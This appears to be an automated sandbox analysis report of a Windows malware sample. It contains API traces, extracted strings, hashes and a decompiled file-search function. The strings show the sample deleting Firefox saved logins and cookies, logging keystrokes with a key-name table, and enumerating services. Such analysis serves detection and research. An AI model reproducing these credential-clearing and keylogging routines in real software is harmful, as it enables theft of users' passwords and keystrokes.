                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,\key3.db,?,?,?,?,?,\logins.json,?,?,?), ref: 00407470
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,\key3.db,?,?,?,?,?,\logins.json,?,?,?), ref: 0040747C
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,\key3.db,?,?,?,?,?,\logins.json,?,?,?), ref: 00407485
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,\key3.db,?,?,?,?,?,\logins.json,?,?,?), ref: 0040748E
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,\key3.db,?,?,?,?,?,\logins.json,?,?,?), ref: 00407497
                                  • DeleteFileA.KERNEL32(00000000,?,?,?,?,?,\key3.db,?,?,?,?,?,\logins.json,?,?,?), ref: 004074A4
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?), ref: 004074FD
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?), ref: 00407506
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?), ref: 0040750F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$??0?$basic_string@D@2@@0@Hstd@@V?$basic_string@$D@1@@V10@$V01@@$??4?$basic_string@FileFindV01@$?c_str@?$basic_string@$CloseDeleteFirstNextV10@@getenv
                                  • String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
                                  • API String ID: 3375041920-3681987949
                                  • Opcode ID: 121eb6264435a5b459c7dd4d2d187141a78bef96a0fd1a1fea0ffd8da6d83978
                                  • Instruction ID: c62cee961eeb0feb44b1f04b02d1ffc3ba69f98c32627a35338bed2311f0f042
                                  • Opcode Fuzzy Hash: 121eb6264435a5b459c7dd4d2d187141a78bef96a0fd1a1fea0ffd8da6d83978
                                  • Instruction Fuzzy Hash: 69712E71C0460EEBCB009BE0DC59DEEBF78AF55355F004176E812E31A0EB74668ACB59
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004113C9, Relevance: 73.8, APIs: 49, Instructions: 252serviceCOMMON
                                  Download Yara Rule
                                  APIs
                                  • OpenSCManagerA.ADVAPI32(00000000,00000000,00000004), ref: 004113D9
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00415800,?), ref: 004113F2
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?,0041B320), ref: 00411408
                                  • EnumServicesStatusW.ADVAPI32(?,0000003B,00000003,?,00000000,?,00410E95,?), ref: 00411438
                                  • GetLastError.KERNEL32 ref: 00411442
                                  • malloc.MSVCRT ref: 00411458
                                  • EnumServicesStatusW.ADVAPI32(?,0000003B,00000003,00000000,?,?,00410E95,?), ref: 00411477
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00416AFC,?), ref: 0041149B
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,?,00000000), ref: 004114A9
                                  • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 004114B5
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004114BE
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004114CA
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00416AFC,?), ref: 004114DB
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,?,00000000), ref: 004114E8
                                  • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 004114F4
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004114FD
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00411509
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00416AFC,?), ref: 0041151A
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$G@std@@U?$char_traits@$G@2@@std@@$??0?$basic_string@G@1@@$??1?$basic_string@$EnumG@2@@0@Hstd@@ServicesStatusV01@V01@@V10@@V?$basic_string@Y?$basic_string@$ErrorLastManagerOpenmalloc
                                  • String ID:
                                  • API String ID: 2829549728-0
                                  • Opcode ID: 58d2b0112fed52923091006d7e237b5b1c9f5be96fd222045ae4672482f29bf9
                                  • Instruction ID: fe864d2e3db6e374d855c0a4c4208b99666831e449a430f346264da0072ddcf9
                                  • Opcode Fuzzy Hash: 58d2b0112fed52923091006d7e237b5b1c9f5be96fd222045ae4672482f29bf9
                                  • Instruction Fuzzy Hash: 5EA1E672C0051AEBCB15DBA0EC98EEEBB78FF58305F04806AF516A2160EB755A45CF58
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040751B, Relevance: 61.4, APIs: 30, Strings: 5, Instructions: 190fileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(00000000,73B76490,00000000), ref: 0040752D
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(00000000), ref: 0040753A
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(\AppData\Roaming\Mozilla\Firefox\Profiles\,00000000), ref: 0040754C
                                  • getenv.MSVCRT ref: 00407558
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,00000000), ref: 00407564
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00407570
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00407579
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00407582
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,?,00415BC8,?), ref: 0040759C
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?), ref: 004075A6
                                  • FindFirstFileA.KERNEL32(00000000,?,?,?), ref: 004075AD
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?), ref: 004075B9
                                  • FindClose.KERNEL32(000000FF,?,?,?), ref: 004075C7
                                  • FindNextFileA.KERNEL32(000000FF,?,?,?,?), ref: 004075F0
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,?,?,\cookies.sqlite,?,?,?), ref: 0040768B
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,\cookies.sqlite,?,?,?), ref: 00407698
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,\cookies.sqlite,?,?,?), ref: 004076A4
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,\cookies.sqlite,?,?,?), ref: 004076AD
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,\cookies.sqlite,?,?,?), ref: 004076B6
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,\cookies.sqlite,?,?,?), ref: 004076BF
                                  • DeleteFileA.KERNEL32(00000000,?,?,?,?,?,\cookies.sqlite,?,?,?), ref: 004076C6
                                  • GetLastError.KERNEL32(?,?,?,?,?,\cookies.sqlite,?,?,?), ref: 004076D0
                                  • FindClose.KERNEL32(000000FF,?,?,?,?,?,\cookies.sqlite,?,?,?), ref: 004076EC
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([Firefox cookies found, cleared!],00000000,?,?,?,?,?,?,?,?,?,\cookies.sqlite,?,?,?), ref: 00407704
                                    • Part of subcall function 00407A90: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,00000000,?,004078A9), ref: 00407A9E
                                    • Part of subcall function 00407A90: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,00000000,?,004078A9), ref: 00407AB1
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,\cookies.sqlite), ref: 00407717
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,\cookies.sqlite), ref: 00407720
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$??0?$basic_string@$D@1@@D@2@@0@FindHstd@@V?$basic_string@$FileV01@@V10@$??4?$basic_string@?c_str@?$basic_string@CloseV01@$DeleteErrorFirstLastNextV10@@getenv
                                  • String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                  • API String ID: 2907366228-432212279
                                  • Opcode ID: 9845358802cc4021ee10908d941d9cf2529172c7ae7851ae6f730565a28c10f6
                                  • Instruction ID: 2cb50fe65e7b882f74eabaaae12ed0bec9aebdba7c4873397d04c6de05a2bb48
                                  • Opcode Fuzzy Hash: 9845358802cc4021ee10908d941d9cf2529172c7ae7851ae6f730565a28c10f6
                                  • Instruction Fuzzy Hash: 0C61A431C0460DEBCB00AFB4DC599EEBB78EF55355F004572E812E3290EB75668ACB59
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00404C0A, Relevance: 60.2, APIs: 40, Instructions: 202fileCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 16%
                                  			E00404C0A(intOrPtr* __ecx, char _a4, char _a20) {
				char _v5;
				void* _v12;
				char _v13;
				char _v14;
				void* _v32;
				char _v48;
				short _v64;
				char _v80;
				char _v96;
				void* _v112;
				char _v128;
				char _v144;
				struct _WIN32_FIND_DATAW _v736;
				char* _t73;
				struct _WIN32_FIND_DATAW* _t75;
				void* _t79;
				void* _t81;
				signed int _t96;
				intOrPtr* _t137;
				void* _t139;
				void* _t141;
				signed int _t145;

				_t137 = __ecx;
				_t60 =  &_v5;
				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z( &_v5);
				__imp__?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ();
				__imp__?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ();
				__imp__?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ();
				E0040504F( &_v5,  &_v5, _t60, __imp__tolower);
				L00414146();
				_t141 = _t139 + 0x1c;
				__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ( &_a4, "*",  &_v736);
				_v12 = FindFirstFileW( &_v64,  &_v64);
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				if(_v12 == 0xffffffff) {
					L11:
					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
					return 1;
				}
				while(FindNextFileW(_v12,  &_v736) != 0) {
					if((_v736.dwFileAttributes & 0x00000010) != 0 && wcscmp( &(_v736.cFileName), ".") != 0 && wcscmp( &(_v736.cFileName), L"..") != 0) {
						__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z( &_v5, 0x5c);
						L0041414C();
						L00414152();
						__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
						__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
						__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z();
						_t141 = _t141 + 0x18;
						__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z();
						E00404C0A(_t137,  &_v64,  &_a20,  &_v64,  &_v144,  &_v144,  &_a4,  &(_v736.cFileName),  &(_v736.cFileName));
						__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
					}
					_t71 =  &(_v736.cFileName);
					__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z( &(_v736.cFileName),  &_v14);
					__imp__?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ();
					__imp__?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ();
					__imp__?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ();
					E0040504F( &(_v736.cFileName),  &(_v736.cFileName), _t71, __imp__tolower);
					_t141 = _t141 + 0x10;
					_t73 =  &_a20;
					__imp__?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIABV12@I@Z(_t73, 0);
					if(_t73 ==  *__imp__?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB) {
						L8:
						__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
						continue;
					} else {
						_t75 =  &_v736;
						__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z(_t75, 0x250,  &_v13);
						__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z(_t75);
						__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
						_t145 = _t141 - 0x10;
						_t96 = _t145;
						_t79 = E00412855( &_v80,  &_v128,  &_a4);
						_t80 =  &_v96;
						L00414140();
						L00414140();
						_t81 = E00402440( &_v96, 0x66, _t96,  &_v96, _t80, _t79, 0x41b310);
						_t141 = _t145 + 0x30;
						__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ( &_v48,  *_t137);
						__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
						if((_t96 & 0xffffff00 | _t81 == 0xffffffff) != 0) {
							__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
							__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
							__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
							__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
							return 0;
						}
						goto L8;
					}
				}
				FindClose(_v12);
				goto L11;
			}

























                                  0x00404c16
                                  0x00404c18
                                  0x00404c1f
                                  0x00404c2f
                                  0x00404c39
                                  0x00404c43
                                  0x00404c4a
                                  0x00404c66
                                  0x00404c6b
                                  0x00404c70
                                  0x00404c80
                                  0x00404c83
                                  0x00404c8d
                                  0x00404e83
                                  0x00404e86
                                  0x00404e8f
                                  0x00404e98
                                  0x00000000
                                  0x00404e9e
                                  0x00404c93
                                  0x00404cb2
                                  0x00404cfa
                                  0x00404d0c
                                  0x00404d19
                                  0x00404d27
                                  0x00404d30
                                  0x00404d3f
                                  0x00404d45
                                  0x00404d4e
                                  0x00404d56
                                  0x00404d5e
                                  0x00404d5e
                                  0x00404d6b
                                  0x00404d72
                                  0x00404d7c
                                  0x00404d86
                                  0x00404d90
                                  0x00404d97
                                  0x00404d9c
                                  0x00404d9f
                                  0x00404da8
                                  0x00404db6
                                  0x00404e44
                                  0x00404e47
                                  0x00000000
                                  0x00404dbc
                                  0x00404dc3
                                  0x00404dcf
                                  0x00404dd9
                                  0x00404de2
                                  0x00404ded
                                  0x00404df0
                                  0x00404e00
                                  0x00404e08
                                  0x00404e0c
                                  0x00404e16
                                  0x00404e20
                                  0x00404e25
                                  0x00404e31
                                  0x00404e3a
                                  0x00404e42
                                  0x00404e55
                                  0x00404e5e
                                  0x00404e67
                                  0x00404e70
                                  0x00000000
                                  0x00404e76
                                  0x00000000
                                  0x00404e42
                                  0x00404db6
                                  0x00404e7d
                                  0x00000000

                                  APIs
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,0041B310,?,76959F40), ref: 00404C1F
                                  • ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(76902590,?,76959F40), ref: 00404C2F
                                  • ?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(00000000,?,76959F40), ref: 00404C39
                                  • ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(00000000,?,76959F40), ref: 00404C43
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,?,0041594C,?), ref: 00404C66
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?), ref: 00404C70
                                  • FindFirstFileW.KERNEL32(00000000,?,?,?), ref: 00404C77
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?), ref: 00404C83
                                  • FindNextFileW.KERNEL32(000000FF,?,?,?,?), ref: 00404C9D
                                  • wcscmp.MSVCRT ref: 00404CCA
                                  • wcscmp.MSVCRT ref: 00404CE2
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,0000005C), ref: 00404CFA
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,000000FF,00000000), ref: 00404D0C
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@G@Z.MSVCP60(?,00000000), ref: 00404D19
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00404D27
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00404D30
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00404D3F
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00404D4E
                                    • Part of subcall function 00404C0A: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00404D5E
                                    • Part of subcall function 00404C0A: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404E55
                                    • Part of subcall function 00404C0A: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404E5E
                                    • Part of subcall function 00404C0A: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404E67
                                    • Part of subcall function 00404C0A: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404E70
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,?,?,?), ref: 00404D72
                                  • ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(76902590,?,?,?), ref: 00404D7C
                                  • ?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(00000000,?,?,?), ref: 00404D86
                                  • ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(00000000,?,?,?), ref: 00404D90
                                  • ?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000), ref: 00404DA8
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(00000010,00000250,?), ref: 00404DCF
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00404DD9
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00404DE2
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,0041B310,?), ref: 00404E0C
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?), ref: 00404E16
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404E31
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404E3A
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404E47
                                  • FindClose.KERNEL32(000000FF,?,?,?), ref: 00404E7D
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?), ref: 00404E86
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?), ref: 00404E8F
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?), ref: 00404E98
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$G@std@@$G@2@@std@@$??1?$basic_string@$D@std@@$D@2@@std@@$??0?$basic_string@$Hstd@@V?$basic_string@$?begin@?$basic_string@$FindG@2@@0@V01@@V10@0@$?end@?$basic_string@D@1@@D@2@@0@FileG@1@@V10@wcscmp$??4?$basic_string@?c_str@?$basic_string@?find@?$basic_string@CloseFirstNextV01@V12@
                                  • String ID:
                                  • API String ID: 1504175218-0
                                  • Opcode ID: 9bf66997af9dd352d6e04f327307b06a99af4f692c5171a00be40cd7f22b4158
                                  • Instruction ID: e99c239ae8235e7f5c20d0f9326128258c52c2c7d0b7d23e31a82f6e10cc2207
                                  • Opcode Fuzzy Hash: 9bf66997af9dd352d6e04f327307b06a99af4f692c5171a00be40cd7f22b4158
                                  • Instruction Fuzzy Hash: 8A711E7280050EEBCB04EFA0EC899EE777CEF94345F548066F516A31A0EB745649CF98
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00405EB2, Relevance: 53.4, APIs: 3, Strings: 27, Instructions: 882COMMON
                                  Download Yara Rule
                                  APIs
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60( [F7] ,?,00000001,?,745E73F0,?), ref: 0040616A
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415B28,?), ref: 004066F4
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415B04,?,?,?,?,00000001), ref: 00406846
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$??0?$basic_string@D@1@@D@2@@std@@D@std@@U?$char_traits@
                                  • String ID: [BckSp] $ [Del] $ [Down] $ [End] $ [Enter] $ [Esc] $ [F10] $ [F11] $ [F12] $ [F1] $ [F2] $ [F3] $ [F4] $ [F5] $ [F6] $ [F7] $ [F8] $ [F9] $ [Left] $ [PagDw] $ [PagUp] $ [Pause] $ [Print] $ [Right] $ [Start] $ [Tab] $ [Up]
                                  • API String ID: 4257247948-3968991301
                                  • Opcode ID: eb2eccc8a731812359348b3976dfce5ea5e72dbce140fbb5fce39ed4468e0386
                                  • Instruction ID: 32f1d40ca48953741c1d4852e97a1265af2d0dfb925f912298a01a30ea5beda6
                                  • Opcode Fuzzy Hash: eb2eccc8a731812359348b3976dfce5ea5e72dbce140fbb5fce39ed4468e0386
                                  • Instruction Fuzzy Hash: 7D32B072A04509BBDB04B6ACC996CFF3A7DE641340B51097BE813B71C2F839596852EF
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040D4E5, Relevance: 35.1, APIs: 18, Strings: 2, Instructions: 132filenetworkCOMMON
                                  Download Yara Rule
                                  APIs
                                  • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(00000000,00000000,00416980), ref: 0040D4FC
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000003), ref: 0040D523
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000002,00000000), ref: 0040D536
                                    • Part of subcall function 004135DE: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?), ref: 004135EE
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040D551
